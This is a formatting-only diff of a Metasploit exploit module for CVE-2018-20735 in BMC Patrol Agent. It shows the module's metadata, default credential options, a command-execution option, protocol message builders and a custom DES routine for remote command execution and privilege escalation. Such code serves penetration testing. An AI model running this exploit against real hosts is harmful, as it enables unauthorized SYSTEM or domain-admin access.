@@ -140,31 +140,30 @@ class MetasploitModule < Msf::Exploit::Remote
   DES_ENCRYPT = 0
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
-      'Description'    => %q(
-        This module leverages the remote command execution feature provided by
-        the BMC Patrol Agent software. It can also be used to escalate privileges
-        on Windows hosts as the software runs as SYSTEM but only verfies that the password
-        of the provided user is correct. This also means if the software is running on a
-        domain controller, it can be used to escalate from a normal domain user to domain
-        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
-        powershell to execute the payload. The powershell version tends to timeout on
-        the first run so it may take multiple tries.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
+        'Description' => %q{
+          This module leverages the remote command execution feature provided by
+          the BMC Patrol Agent software. It can also be used to escalate privileges
+          on Windows hosts as the software runs as SYSTEM but only verfies that the password
+          of the provided user is correct. This also means if the software is running on a
+          domain controller, it can be used to escalate from a normal domain user to domain
+          admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
+          powershell to execute the payload. The powershell version tends to timeout on
+          the first run so it may take multiple tries.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'b0yd' # @rwincey / Vulnerability Discovery and MSF module author
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2018-20735'],
           ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
         ],
-      'Platform'       => ['win', 'linux'],
-      'Targets'        =>
-        [
+        'Platform' => ['win', 'linux'],
+        'Targets' => [
           [
             'Windows Powershell Injected Shellcode', {
               'Platform' => 'win'
@@ -177,22 +176,28 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'Privileged'     => true,
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {
-        'DisablePayloadHandler' => true
-      },
-      'DisclosureDate' => '2019-01-17'))
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'DisclosureDate' => '2019-01-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(3181),
-        OptString.new('USER',     [true,  'local or domain user to authenticate with patrol', 'patrol']),
-        OptString.new('PASSWORD', [true,  'password to authenticate with patrol', 'password']),
-        OptString.new('CMD',      [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
+        OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']),
+        OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']),
+        OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
       ]
     )
-
   end
 
   def cleanup
@@ -223,7 +228,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_cmd_output(cmd_output_msg)
-
     lines = cmd_output_msg.split("\n")
     fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
 
@@ -236,7 +240,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     # Manually start the handler if not running a single command
     if datastore['CMD'].nil? || datastore['CMD'].empty?
 
@@ -327,11 +330,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Handle the shell
     handler
-
   end
 
   def receive_msg
-
     header = sock.get_once(6)
     if header.nil?
       return
@@ -348,11 +349,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return header + payload
-
   end
 
   def send_msg(type, compression, data)
-
     data_len = data.length
     buf = [data_len].pack('N')
 
@@ -367,11 +366,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Send msg
     sock.put(buf)
-
   end
 
   def process_response(ret_data)
-
     # While style checks complain, I intend to leave this parsing
     # in place for debugging purposes
     ret_size_arr = ret_data[0, 4]
@@ -387,11 +384,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return payload_data
-
   end
 
   def run_cmd(cmd)
-
     user_num = rand 1000..9999
     msg_1 = %(R_E
 {
@@ -408,11 +403,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # Compress the message
     comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
     send_msg(0x44, 0x0, comp_data)
-
   end
 
   def identify(user)
-
     inner_len = 15
     msg_type = 8
     len_str = [inner_len].pack("N")
@@ -429,7 +422,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # Compress the message
     comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
     send_msg(0x44, 0x0, comp_data)
-
   end
 
   def create_session
@@ -462,11 +454,9 @@ class MetasploitModule < Msf::Exploit::Remote
     msg_1 += "\x00"
     comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
     send_msg(0x44, 0x0, comp_data)
-
   end
 
   def rotate_block_init(input_block_tuple)
-
     v6 = 0
     v5 = 0
     input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
@@ -674,7 +664,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def rotate_block_final(input_block_tuple)
-
     v6 = 0
     v5 = 0
     input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
@@ -957,7 +946,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ret_block.push left
     ret_block.push right
     ret_block
-
   end
 
   def store(data_block)
@@ -967,7 +955,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def sbox_xors(data_block_in, ksch_arg, decrypt_flag)
-
     decrypt_flag_cpy = decrypt_flag
     if (decrypt_flag & 0x100) != 0
       data_block_0 = data_block_in
@@ -999,11 +986,9 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       data_block_0
     end
-
   end
 
   def gen_key_unchecked(key)
-
     idx = 0
     key_arr = key.unpack("V*")
     key_sch = Array.new
@@ -1050,7 +1035,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def des_string_to_key(key_buf_str)
-
     des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0)
     des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1)
 
@@ -1085,7 +1069,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def des_cbc(input_buf, key_sch, iv, decrypt_flag)
-
     output_block_arr = Array.new
     blocks = input_buf.unpack("Q<*")
     for i in 0..blocks.length - 1
@@ -1111,7 +1094,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     output_block_arr.pack("Q<*")
-
   end
 
   def des_crypt_func(binary_buf, key_buf, decrypt_flag)
